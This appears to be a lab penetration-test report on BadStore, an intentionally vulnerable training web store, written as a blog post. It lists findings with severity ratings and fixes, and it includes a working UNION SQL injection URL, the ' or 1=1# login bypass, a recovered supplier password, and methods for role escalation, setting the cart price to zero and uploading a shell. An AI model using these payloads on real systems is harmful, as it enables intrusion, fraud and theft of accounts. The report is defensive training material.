BadStore Webapp Report
1 Sensitive Data Exposure
#Severity :
HIGH
#Ease Of Exploitation :
EASY
#Affected URL/Device :
#Analysis :
It was observed that the webapp sends all requests in plain
text without any encryption . It is very easy to intercept requests and
manipulate or read them . Passwords and CC no , such type of sensitive data is
transported in plain text without encryption .
#Impact :
Attacker can sniff traffic and intercept sensitive
information such as login credentials and credit card information . Very easy
to sniff traffic and perform MITM attack .
#Recommendation :
Use SSL encryption / TLS encryption with strong cipher key
and use CA authority certificate . This will prevent such attacks .
2 Security Misconfiguration
2.1 Directory Listing Enabled
#Severity
LOW
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
It is possible to view the directory listing. Directory
listing may reveal hidden scripts, include files , backup source files etc
which be accessed to read sensitive information.
The directory listing of supplier has accounts file with
supplier id and credentials (base64 encoded) stored in plain text .
We are able to get supplier joe username and password :
platnum
#Impact
Leakage of information and directory structure . User may
get to know about hidden files and folders that might contain important data
such as backups or secret files .
#Recommendation
Disable directory listing using htaccess file
2.2 Application Error Disclosure
#Severity
LOW
#Ease Of Exploitation
EASY
#Affected URL/Device
and any other URL that is broken , basically any broken URL
gives the info we need for basic fingerprinting
#Analysis
This page contains an error/warning message that may
disclose sensitive information like the location of the file that produced the
unhandled exception. This information can be used to launch further attacks
against the web application. In this case we come to know that the web server
is using Apache/1.3.28 Server at 192.168.0.104 Port 80 . This info can be used
to perform more advanced attack and in fingerprinting to get additional info on
target
#Impact
Attacker gets additional info on target and it helps in
fingerprinting web app .
#Recommendation
Disable such Error disclosures and web app
diagnostics/debugging errors
2.3 Robots.txt is not protected
#Severity
LOW
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
Robots.txt is a file that is used to tell the crawlers which
part of websites are allowed to be crawled and indexed and which are not
allowed . But doing so it is also a major cause of information leakage because
a user can easily access it and find out the directories that are supposed to
be hidden from crawlers
#Impact
Users can easily find out which directories are interesting
and are not supposed to be known to others . Thus it reduces the burden of
mapping the web app . In this case we can see /backup and /upload /supplier
/cgi-bin /scanbot are all interesting directories and might have some info .
#Recommendation
Protect Robots.txt with .htaccess file or basic
authentication
3 Using component with known
vulnerabilities
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
http://192.168.0.104/
#Analysis
Apache/1.3.28 suffers from multiple remote code executions
and buffer overflow vulnerabilities with known and working exploits
#Impact
Successful exploitation results in RCE and Denial of service
by crashing apache process
#Recommendation
Update Apache to latest version
4.SQL Injection
#Severity
HIGH
#Ease Of Exploitation
Medium
#Affected URL/Device
#Analysis
It was observed that the above URL and parameters like email
password are vulnerable to SQL injection
Query :
http://192.168.0.104/cgi-bin/badstore.cgi?searchquery=%27+or+1%3D1+union+select+database%28%29%2Cnull%2Cnull%2Cnull+%23&action=search&x=0&y=0
As we can see we successfully got database name J
We can also bypass authentication and login as first user
with SQL injection by giving ‘ or 1=1# in both username and password fields
Which results in login as test user
#Impact
Successful exploitation results in compromise of entire DB
#Recommendation
- Use prepared statements in SQL
- Use stored procedures
- Use whitelist and give least privileges
5. XSS (Cross site scripting)
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
http://192.168.0.104/cgi-bin/badstore.cgi?action=doguestbook
#Analysis
Reflected XSS is present in the search query parameter which
can allow attacker to execute arbitrary scripts on client browser
Stored XSS is also present in doguestbook page . This is
more severe than reflective XSS
#Impact
Successful exploitation of XSS can result in compromise of
users session and sometimes even entire system can be compromised using
dedicated XSS frameworks like beef
#Recommendation
Use anti XSS libraries and use whitelisting . Sanitize the
user input with regex .
6.Insecure Direct Object Reference
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
We can guess and pass the object reference to action
parameter and without validation it executes our requests . This allows us to
bypass CC payment and order without paying money ,it also gives us access to
secret admin portal
#Impact
Allows users to bypass certain mechanisms and allows them
access to restricted areas to websites . For E-commerce applications ,
bypassing payment and placing orders is disastrous . Thus financial impact is
very very high
#Recommendation
Use authentication and authorization and functional level
access control at URL,Body and code level
7.Broken Authentication and session management
#Severity
HIGH
#Ease Of Exploitation
MEDIUM
#Affected URL/Device
#Analysis
It is
observed that when creating a new user , a hidden field named role is passed
with values (U for user , A admin and S supplier ). Manipulating this field
with proxy can register a user as admin or supplier without proper validation
and authorization . Thus anyone can become admin
#Impact
Malicious users can register as admin and gain all
privileges over the webapp . This results in complete compromise of the webapp
#Recommendation
A new registered user must always be given lowest privilege
(User in this case ) and then if needed
, the administrator can escalate his privilege later . The user registration
module itself is flawed .
7.1 No HTTPonly Cookie and Weak Session ID
#Severity
MEDIUM
#Ease Of Exploitation
MEDIUM
#Affected URL/Device
#Analysis
It is observed that the cookies generated by the webapp are
not set to HTTPonly or secured cookies , instead they are in plaintext and are
vulnerable to XSS attacks stealing cookies from users using document.cookie()
payload .
This can result in session hijacking and compromise of users
session , admin session can also be compromised due to stored XSS as discovered
earlier .
It is also observed that the webapp creates very weak cart
ID that is easy to decode and manipulate
When decoded the cart id shows :
1444628668:2:24:1000:1003
Which means 2 items costing 24$ and the item no 1000 and
1003 . We can manipulate the cost price 24$ to 0$ and buy the items for free
#Impact
As we saw earlier we can register a new user as admin and
manipulate the cart ID to buy items for free . This can result in compromise of
webapp and very high financial losses for the company
#Recommendation
Use HTTPonly and secure cookie options whenever creating a
new cookie and transporting it . Use stronger encoding scheme for cartID and
perform validation check to make sure that the price is not tampered with
7 .2 Web forms allow password caching in
client side
#Severity
LOW
#Ease Of Exploitation
DIFFICULT
#Affected URL/Device
http://192.168.0.101/cgi-bin/badstore.cgi?action=supplierlogin
#Analysis
Most of commercial and open-source Web Browser allow users
to cache username and password values for convenience purposes -- in this way,
they will not need to re-enter the values everytime the same form is rendered
in the browser. Although it seems like a feature for end-users, information
store at client-side cannot be trusted and user's credentials can be easily
stolen if not properly protected. An attacker may be able to replay the
authentication procedure and logon as a legimate user.
#Impact
user's credentials can be easily stolen if not properly
protected. An attacker may be able to replay the authentication procedure and
logon as a legimate user.
#Recommendation
Developers must use autocomplete=off property in Web
Application Forms to instruct browsers to avoid password storing capabilities.
Example: <form autocomplete=off>
7.3 X Frame Option not set
#Severity
LOW
#Ease Of Exploitation
DIFFICULT
#Affected URL/Device
http://192.168.0.101/
#Analysis
It was observed that X-Frame-Options header is not included
in the HTTP response to protect against 'ClickJacking' attacks.
#Impact
Users are vulnerable to clickjacking attack where they maybe
fooled into clicking malicious buttons that are transparent and hidden above
the legitimate button . This can be used to defeat CSRF tokens
#Recommendation
Most modern Web browsers support the X-Frame-Options HTTP
header. Ensure it's set on all web pages returned by your site (if you expect
the page to be framed only by pages on your server (e.g. it's part of a
FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the
page to be framed, you should use DENY. ALLOW-FROM allows specific websites to
frame the web page in supported web browsers).
7.4 Emails Found
#Severity
LOW
#Ease Of Exploitation
DIFFICULT
#Affected URL/Device
http://192.168.0.101/
#Analysis
While crawling the webapp , we found multiple emails that
can be used for social engineering purposes or can be used to guess usernames
for credential harvesting
#Impact
Emails gathered can be used for social engineering attacks
and usernames can be guessed for login using these emails
#Recommendation
Just make sure to train staff about social engineering attacks
and not to fall for them . Also keep username different for login than the
emails
8.File Upload
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
It is observed that the webapp allows supplier to upload any
file they want as price list . A malicious supplier can upload a php shell and
compromise the webapp and entire server
#Impact
It can result in compromise of the entire webapp
#Recommendation
Perform validation of mime type of the uploaded document and
make sure that the uploader is only uploading the files that you want such as
txt , img and not something else . Never allow uploader to upload php files and
if allowed then make sure to set the uploaded file permissions to only read and
not execute
9.Weak Password Recovery Mechanism
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
It is observed that the password recovery mechanism is very
poor and it is a matter of few guesses to bypass the password . All we need is
users full name and his email ID . Both can be found from the few entries in
guestbook . Now we have to simply guess
the favourite color and use burp repeater to brute force the color
As we can see , we successfully logged in as Joe Shopper by
guessing his favourite color as green . Thus the password recovery mechanism is
very weak .
#Impact
Allows malicious users to login as other user and
impersonate them and purchase on their behalf . Results in compromise of
customers account .
#Recommendation
- Use lockdown policy to lockout the account after few tries .
- Use anti automation like CAPTCHA
- Change the password recovery system to something more complex . The current system is very weak
testing crypt
ReplyDelete